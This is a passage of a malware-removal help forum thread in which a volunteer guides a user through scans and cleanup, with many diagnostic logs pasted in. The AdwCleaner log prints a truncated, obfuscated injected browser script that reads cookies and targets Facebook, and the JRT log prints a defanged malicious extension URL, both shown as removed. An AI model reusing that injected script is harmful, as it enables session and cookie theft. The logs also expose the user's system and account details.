2011-06-28 20:12 - 2011-06-28 20:12 - 00381952 _____ () C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\Vodafone.View.Taskbar.dll
2009-07-14 02:33 - 2009-07-14 06:45 - 00364544 _____ () C:\Windows\system32\msjetoledb40.dll
2009-06-18 00:10 - 2009-06-18 00:10 - 02121728 _____ () C:\Program Files\Common Files\LightScribe\QtCore4.dll
2009-06-18 00:10 - 2009-06-18 00:10 - 07745536 _____ () C:\Program Files\Common Files\LightScribe\QtGui4.dll
2009-06-18 00:10 - 2009-06-18 00:10 - 00135168 _____ () C:\Program Files\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2009-07-02 04:14 - 2009-07-02 04:14 - 00632888 _____ () C:\Program Files\Hewlett-Packard\Shared\hpqToaster.exe
2015-02-10 02:18 - 2014-06-11 10:14 - 03765872 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2015-02-06 09:01 - 2015-02-06 09:01 - 16852144 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccEvtMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccSetMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Lavasoft Ad-Aware Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antivirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antvirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ccEvtMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ccSetMgr => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Lavasoft Ad-Aware Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Symantec Antivirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Symantec Antvirus => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== Other Registry Areas =====================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: MiPhoneManager => "C:\Users\VIJAY\AppData\Local\MiPhoneManager\main\MiPhoneHelper.exe"
MSCONFIG\startupreg: MobileBroadband => C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe /silent
MSCONFIG\startupreg: OliveDcService => C:\Program Files\TATA Photon+\Olive\CE310\Drivers\OliveDcService.exe
MSCONFIG\startupreg: TATA Photon+ Dialer => "C:\Program Files\TATA Photon+\Olive\CE310\TTSL Olive CE310 Dialer Ver 1.1.7 Release 000.exe"
MSCONFIG\startupreg: VmbNotifier => C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbNotifier.exe

==================== Accounts: =============================

Administrator (S-1-5-21-1443430433-3504582150-3450442512-500 - Administrator - Disabled)
Guest (S-1-5-21-1443430433-3504582150-3450442512-501 - Limited - Disabled)
VIJAY (S-1-5-21-1443430433-3504582150-3450442512-1000 - Administrator - Enabled) => C:\Users\VIJAY

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (02/11/2015 11:57:36 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:55:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:17:45 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error. Available content updates may have failed to install.

Error: (02/11/2015 01:46:43 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154

Error: (02/11/2015 01:46:22 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error. Available content updates may have failed to install.

Error: (02/10/2015 11:41:52 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:27:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000170,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,025EF8D8.64). hr = 0x80070005, Access is denied.
.

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEC0.64). hr = 0x80070005, Access is denied.
.

Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEAC.64). hr = 0x80070005, Access is denied.
.

Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}

System errors:
=============
Error: (02/11/2015 11:59:12 AM) (Source: Microsoft-Windows-Application-Experience) (EventID: 205) (User: NT AUTHORITY)
Description: The Program Compatibility Assistant service failed to perform the phase two initialization.

Error: (02/11/2015 11:56:24 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv.dll

Error: (02/11/2015 11:56:24 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv.dll

Error: (02/11/2015 11:56:17 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\bcmihvsrv.dll

Error: (02/11/2015 11:55:20 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056

Error: (02/11/2015 11:54:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Symantec Endpoint Protection service, but this action failed with the following error:
%%1056

Error: (02/11/2015 11:54:51 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Com4QLBEx service terminated unexpectedly. It has done this 1 time(s).

Error: (02/11/2015 11:54:50 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The HP Health Check Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (02/11/2015 11:54:50 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (02/11/2015 11:54:48 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Live ID Sign-in Assistant service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Microsoft Office Sessions:
=========================
Error: (02/11/2015 11:57:36 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:55:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/11/2015 11:17:45 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error. Available content updates may have failed to install.

Error: (02/11/2015 01:46:43 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154

Error: (02/11/2015 01:46:22 AM) (Source: SescLU) (EventID: 13) (User: )
Description: LiveUpdate returned a non-critical error. Available content updates may have failed to install.

Error: (02/10/2015 11:41:52 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:27:50 AM) (Source: VmbService) (EventID: 0) (User: )
Description: conflictManagerTypeValue

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: RegSetValueExW(0x00000170,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,025EF8D8.64)0x80070005, Access is denied.

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEC0.64)0x80070005, Access is denied.

Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}

Error: (02/10/2015 11:25:41 AM) (Source: VSS) (EventID: 8193) (User: )
Description: RegSetValueExW(0x000006c8,(null),0,REG_BINARY,01D6EEAC.64)0x80070005, Access is denied.

Operation:
   BackupShutdown Event

Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {3ac2141b-bb93-44eb-91c6-db8a93217816}

==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU T6600 @ 2.20GHz
Percentage of memory in use: 46%
Total physical RAM: 3038.96 MB
Available physical RAM: 1615.91 MB
Total Pagefile: 6076.2 MB
Available Pagefile: 4313.82 MB
Total Virtual: 2047.88 MB
Available Virtual: 1908.59 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:143.13 GB) (Free:13.23 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (New Volume) (Fixed) (Total:142.02 GB) (Free:8.17 GB) NTFS
Drive e: (RECOVERY) (Fixed) (Total:12.74 GB) (Free:2.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 2D20BDEB)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=143.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=142 GB) - (Type=OF Extended)
Partition 4: (Not Active) - (Size=12.7 GB) - (Type=07 NTFS)

==================== End Of Log ============================

#7 OCD

SuperHelper

Malware Team
5,574 posts

Posted 11 February 2015 - 09:01 PM

Hi vijay.gupta,

Is your Symantec Endpoint Protection a paid version?

=========================

Malwarebytes' Anti-Malware

Download Malwarebytes' Anti-Malware (save it to your desktop).

- Windows XP : Double click on the icon to run it.
- Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
Select Scan tab.
Select type of scan to perform:
- Threat Scan < --- Select this type of scan
- Custom Scan
- Hyper Scan
Next click the Scan button.
When the scan is complete, if no malicious items are found you can close the program.
If malicious items are found be sure that everything is checked, and click Quarantine .
When completed, a log will open in Notepad. Please save it to a convenient location and post the results.
Note: If you receive a notice that some of the items couldn't be removed, that they have been added to the delete on reboot list, please reboot.

=========================

ESET Online Scanner

*Note:

It is recommended to disable on-board antivirus program and anti-spyware programs while performing scans so there are no conflicts and it will speed up scan time.
Please don't go surfing while your resident protection is disabled!
Once the scan is finished remember to re-enable your antivirus along with your anti-spyware programs.

** You need to run your browser with Administrator Rights, to do so right click your browsers short cut and select "Run as Administrator".

= = = = = = = = = = = = = = = = = = = =

Go here to run ESET Online Scanner

(Note: You can use Internet Explorer or FireFox for this scan. If you use FireFox you will be asked to install an additional component. Please allow this.)

Tick the box next to YES, I accept the Terms of Use.
Click Start
When asked, allow the activex control to install
Disable your Antivirus software. You can usually do this with its Notification Tray icon near the clock
Click Start
Make sure that the option "Remove found threats" is Checked, and the option "Scan unwanted applications" is Checked.
Click Scan.
Wait for the scan to finish.
When the scan completes, click List of found threats
click Export to Text file and save the file to your desktop using a unique name, such as ESETScan.
Include the contents of this report in your next reply

Note - when ESET doesn't find any threats, no report will be created.
Push the back button.
Push Finish
Re-enable your Antivirus software.

=========================

In your next post please provide the following:

MBAM log
ESET's log.txt

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days

If you are satisfied with the help you have received, please consider making a donation.

#8 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 13 February 2015 - 01:19 AM

Yes. Its corporate paid version.

Malwarebytes' Anti-Malware did't find anything suspicious. That's why, it doesn't generated any log.

ESET Log:

C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js   JS/Kryptik.ATB trojan
C:\ProgramData\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js   JS/Kryptik.ATB trojan   cleaned by deleting - quarantined
C:\Users\VIJAY\Downloads\S5830i_Modem_Files.zip.exe   a variant of Win32/Adware.MultiPlug.ET application   cleaned by deleting - quarantined
D:\data\kismat\New folder\Bhaji In Problem (2013) DVDRip - XviD - 1CD - Esub - [DDR].lnk   LNK/Agent.AK trojan   cleaned by deleting - quarantined
D:\data\kismat\New folder\The Croods (2013) 720p Blu-Ray x264 [Dual-Audio] [English + Hindi DD 5.lnk   LNK/Agent.AK trojan   cleaned by deleting - quarantined
D:\dumps\NbuExplorer_v3.2_SomotoBinno.exe   Win32/Somoto.E potentially unwanted application   deleted - quarantined

#9 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 13 February 2015 - 01:20 AM

Also, I have not uninstalled any of the application ESET and Malware Bytes. Please let me know if I need to do it so.

#10 OCD

SuperHelper

Malware Team
5,574 posts

Posted 13 February 2015 - 01:51 AM

Hi vijay.gupta,

Hold off removing any tools in case we have to use them again.

Try uninstalling your Symantec Endpoint Protection, reboot then reinstall the program and see if you are able to obtain the latest definitions.

Re- run AdwCleaner

It should be on your desktop

- Windows XP : Double click on the icon to run it.
- Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
Click on the Scan button.
AdwCleaner will begin to scan your computer like it did before.
After the scan has finished...
This time, click on the Clean button.
Press OK when asked to close all programs and follow the onscreen prompts.
Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
After rebooting, a log file report (AdwCleaner[S0].txt) will open automatically.
Copy and paste the contents of that log file in your next reply.
A copy of that log file will also be saved in the C:\AdwCleaner folder.
=========================

Junkware Removal Tool

Download Junkware Removal Tool to your desktop.
- - Windows XP : Double click on the icon to run it.
  - Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
- Shut down your protection software now to avoid potential conflicts.
- The tool will open and start scanning your system.
- Please be patient as this can take a while to complete depending on your system's specifications.
- On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
- Post the contents of JRT.txt into your next message.
=========================

FRST Fix Script

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad. Save it on the desktop as fixlist.txt
```
Start
C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js
End
```
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST and press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

=========================

In your next post please provide the following:
- AdwCleaner[S0].txt
- JRT.txt
- Fixlog.txt
- Update on AV

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days

If you are satisfied with the help you have received, please consider making a donation.

Advertisements

Register to Remove

#11 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 13 February 2015 - 04:38 AM

First, I tried repairing Anti-Virus but it didn't helped. Then, I tried uninstalling and reinstalling it but it also didn't helped.

It seems that there is something that is blocking the update of Anti-virus. After Adwcleaner scan was complete, there was some detection by Antivirus that said something like Updation process was terminated.

AdwCleaner[S0].txt

# AdwCleaner v4.110 - Logfile created 13/02/2015 at 15:40:09
# Updated 05/02/2015 by Xplode
# Database : 2015-02-13.1 [Server]
# Operating system : Windows 7 Home Basic Service Pack 1 (x86)
# Username : VIJAY - VIJAY-PC
# Running from : C:\Users\VIJAY\Desktop\AdwCleaner.exe
# Option : Cleaning

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17631

-\\ Mozilla Firefox v36.0 (x86 en-US)

[agyg75sl.default\prefs.js] - Line Deleted : user_pref("extensions.dGngmy3KVsGqkpGt.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"rjrErTwEqdw5qTnEpja7rdY9qHk\")>-1url.indexOf(\"acebook\")>-[...]

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [1013 bytes] - [11/02/2015 11:46:34]
AdwCleaner[R1].txt - [1072 bytes] - [13/02/2015 15:30:57]
AdwCleaner[S0].txt - [1010 bytes] - [13/02/2015 15:40:09]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1069 bytes] ##########

JRT.txt

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.2 (02.02.2015:1)
OS: Windows 7 Home Basic x86
Ran by VIJAY on 13-02-2015 at 15:49:52.52
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~ Services

~~~ Registry Values

~~~ Registry Keys

~~~ Files

~~~ Folders

~~~ FireFox

Successfully deleted the following from C:\Users\VIJAY\AppData\Roaming\mozilla\firefox\profiles\agyg75sl.default\prefs.js

user_pref("browser.search.searchengine.desc", "this is my first firefox searchEngine");
user_pref("browser.search.searchengine.ptid", "wpc");
user_pref("browser.search.searchengine.uid", "HitachiXHTS723232L9A360_090816FCC400NEHATBLGX");
user_pref("extensions.pzDbLOABfOSiFt42.url", "hxxp://storageinstallbardirectory.in/sync2/?q=hfZ9ofV9CShEAen0rTa9pjkMg708BNmGWj8tjShGheDUojw8rdsEpjw4qdwGrchIC7n0rjkErTa4rjU9qdw
Emptied folder: C:\Users\VIJAY\AppData\Roaming\mozilla\firefox\profiles\agyg75sl.default\minidumps [48 files]

~~~ Event Viewer Logs were cleared

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 13-02-2015 at 15:52:58.64
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Fixlog.txt

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 12-02-2015
Ran by VIJAY at 2015-02-13 15:59:37 Run:2
Running from C:\Users\VIJAY\Desktop
Loaded Profiles: VIJAY (Available profiles: VIJAY)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
Start
C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js
End
*****************

"C:\Users\All Users\hoifinhnlbhamdnldibkogbgiiefbnfh\Z84P4.js" => File/Directory not found.

==== End of Fixlog 15:59:37 ====

#12 OCD

SuperHelper

Malware Team
5,574 posts

Posted 13 February 2015 - 09:23 AM

Hi vijay.gupta ,

Yes. Its corporate paid version.

Is this a company computer?
Is there more than one computer that displays this issue?

First, I tried repairing Anti-Virus but it didn't helped. Then, I tried uninstalling and reinstalling it but it also didn't helped.

Try running this tool, then immediately try and update your virus definitions.

rkill

Print out these instructions as we may need to close every window that is open later in the fix.

It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested in this guide on another computer and then transfer them to the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

Do not reboot your computer after running rkill as the malware programs will start again.

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 5 different versions. If one of them won't run then download and try to run the other one.

Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

You only need to get one of them to run, not all of them.

Do not reboot your computer after running rkill as the malware programs will start again.

=========================

Try and update virus definitions, if unsuccessful continue with the next step. If successful stop and report back (skip next step).

=========================

TDSSKiller

Please download TDSSKiller.zip - Extract it to your desktop
or from here >> http://www.bleepingc...oad/tdsskiller/

TDSSKiller.exe
- Windows XP : Double click on the icon to run it.
- Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
Select Change Parameters.

Under Additional Options, select all options. The select OK.

Next press the Start Scan button.
- Only if Malicious objects are found then ensure Cure is selected
- Then click Continue > Reboot now
Copy and paste the log in your next reply
- A copy of the log will be saved automatically to the root of the drive (typically C:\)

=========================

In your next post please provide the following:

TDSSKiller log
Update on AV

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days

If you are satisfied with the help you have received, please consider making a donation.

#13 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 14 February 2015 - 10:33 AM

It is not an office computer but my personal laptop and the antivirus is provided by company. No, it is not happening on multiple computers.

Both the logs are pasted below. When I ran TDS Killer, 2 threats are found with medium risk. But, it is the exe file for dongle through which Internet is running. So I skipped deleting them. I have attached the screenshot for the threats. please let me know if I still delete them and check if it fixes the issue.

The issue is still not fixed.

RKill.exe

Rkill 2.7.0 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2015 BleepingComputer.com
More Information about Rkill can be found at this link:
http://www.bleepingc...opic308364.html

Program started at: 02/14/2015 09:44:32 PM in x86 mode.
Windows Version: Windows 7 Home Basic Service Pack 1

Checking for Windows services to stop:

* No malware services found to stop.

Checking for processes to terminate:

* C:\ProgramData\DatacardService\HWDeviceService.exe (PID: 2344) [AU-HEUR]
* C:\ProgramData\DatacardService\DCSHelper.exe (PID: 2420) [AU-HEUR]

2 proccesses terminated!

Checking Registry for malware related settings:

* No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

* Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

Checking Windows Service Integrity:

* Windows Defender (WinDefend) is not Running.
   Startup Type set to: Manual

Searching for Missing Digital Signatures:

* No issues found.

Checking HOSTS File:

* No issues found.

Program finished at: 02/14/2015 09:45:59 PM
Execution time: 0 hours(s), 1 minute(s), and 27 seconds(s)

TDSKiller Log:

21:53:06.0101 0x1cb8 TDSS rootkit removing tool 3.0.0.44 Jan 22 2015 08:27:04
21:53:12.0871 0x1cb8 ============================================================
21:53:12.0871 0x1cb8 Current date / time: 2015/02/14 21:53:12.0871
21:53:12.0871 0x1cb8 SystemInfo:
21:53:12.0871 0x1cb8
21:53:12.0871 0x1cb8 OS Version: 6.1.7601 ServicePack: 1.0
21:53:12.0871 0x1cb8 Product type: Workstation
21:53:12.0871 0x1cb8 ComputerName: VIJAY-PC
21:53:12.0887 0x1cb8 UserName: VIJAY
21:53:12.0887 0x1cb8 Windows directory: C:\Windows
21:53:12.0887 0x1cb8 System windows directory: C:\Windows
21:53:12.0887 0x1cb8 Processor architecture: Intel x86
21:53:12.0887 0x1cb8 Number of processors: 2
21:53:12.0887 0x1cb8 Page size: 0x1000
21:53:12.0887 0x1cb8 Boot type: Normal boot
21:53:12.0887 0x1cb8 ============================================================
21:53:15.0133 0x1cb8 KLMD registered as C:\Windows\system32\drivers\88729230.sys
21:53:16.0022 0x1cb8 System UUID: {8A705969-EA06-BB3A-E3FE-13B16BA23A66}
21:53:17.0411 0x1cb8 Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
21:53:17.0426 0x1cb8 ============================================================
21:53:17.0426 0x1cb8 \Device\Harddisk0\DR0:
21:53:17.0426 0x1cb8 MBR partitions:
21:53:17.0426 0x1cb8 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
21:53:17.0426 0x1cb8 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0x11E40800
21:53:17.0442 0x1cb8 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x11EA5000, BlocksNum 0x11C0C800
21:53:17.0442 0x1cb8 \Device\Harddisk0\DR0\Partition4: MBR, Type 0x7, StartLBA 0x23AB2000, BlocksNum 0x197C000
21:53:17.0442 0x1cb8 ============================================================
21:53:17.0473 0x1cb8 C: <-> \Device\Harddisk0\DR0\Partition2
21:53:17.0598 0x1cb8 D: <-> \Device\Harddisk0\DR0\Partition3
21:53:17.0691 0x1cb8 E: <-> \Device\Harddisk0\DR0\Partition4
21:53:17.0691 0x1cb8 ============================================================
21:53:17.0691 0x1cb8 Initialize success
21:53:17.0691 0x1cb8 ============================================================
21:53:34.0664 0x1f20 ============================================================
21:53:34.0664 0x1f20 Scan started
21:53:34.0664 0x1f20 Mode: Manual; SigCheck; TDLFS;
21:53:34.0664 0x1f20 ============================================================
21:53:34.0664 0x1f20 KSN ping started
21:53:58.0111 0x1f20 KSN ping finished: true
21:54:01.0434 0x1f20 ================ Scan system memory ========================
21:54:01.0434 0x1f20 System memory - ok
21:54:01.0434 0x1f20 ================ Scan services =============================
21:54:01.0808 0x1f20 [ 1B133875B8AA8AC48969BD3458AFE9F5, 01753BDD47F3F9BC0E0D23A069B9C56D4AE6A6B6295BC19B95AE245D25B12744 ] 1394ohci        C:\Windows\system32\drivers\1394ohci.sys
21:54:02.0042 0x1f20 1394ohci - ok
21:54:02.0261 0x1f20 [ CEA80C80BED809AA0DA6FEBC04733349, AE69C142DC2210A4AE657C23CEA4A6E7CB32C4F4EBA039414123CAC52157509B ] ACPI            C:\Windows\system32\drivers\ACPI.sys
21:54:02.0276 0x1f20 ACPI - ok
21:54:02.0323 0x1f20 [ 1EFBC664ABFF416D1D07DB115DCB264F, BF94D069D692140B792DBF4FD3CB0127D27C26CC5BFB6B0C28A8B6346767EE58 ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
21:54:02.0370 0x1f20 AcpiPmi - ok
21:54:02.0495 0x1f20 [ FC5B75CA6A1DA31EDD4F8D53F5540B98, CDC445F2790ADFC4C5568C40D4DA8BB95CD71991665B38AEC3D84571C99C3520 ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
21:54:02.0541 0x1f20 AdobeARMservice - ok
21:54:02.0713 0x1f20 [ 080255CDCB878813B481B8C348D47D8E, 75808821FBC732D0504795B8F85852E4C01D3B412989A1E597E1295CFF7B7A45 ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
21:54:02.0744 0x1f20 AdobeFlashPlayerUpdateSvc - ok
21:54:02.0838 0x1f20 [ 21E785EBD7DC90A06391141AAC7892FB, A2D3D764C5E6DC0AD5AAF48485FFB8B121D2A40DC08ECF2D2CB92278A1002B25 ] adp94xx         C:\Windows\system32\DRIVERS\adp94xx.sys
21:54:02.0900 0x1f20 adp94xx - ok
21:54:02.0947 0x1f20 [ 0C676BC278D5B59FF5ABD57BBE9123F2, 339E8A433D186BAAB6FCB44C82CC9FB6FCD63C87981449494CBEB2072CB6B7BB ] adpahci         C:\Windows\system32\DRIVERS\adpahci.sys
21:54:02.0994 0x1f20 adpahci - ok
21:54:03.0025 0x1f20 [ 7C7B5EE4B7B822EC85321FE23A27DB33, A934AFB71D439555E6376DA9B34F82E8D39A300A4547BE9AC9311F6A3C36270C ] adpu320         C:\Windows\system32\DRIVERS\adpu320.sys
21:54:03.0056 0x1f20 adpu320 - ok
21:54:03.0087 0x1f20 [ 8B5EEFEEC1E6D1A72A06C526628AD161, 026CDF4C96F4D493E7BABF79A14C4B0B5ADCCEF0B081FFFA2E3B243B2414167F ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
21:54:03.0150 0x1f20 AeLookupSvc - ok
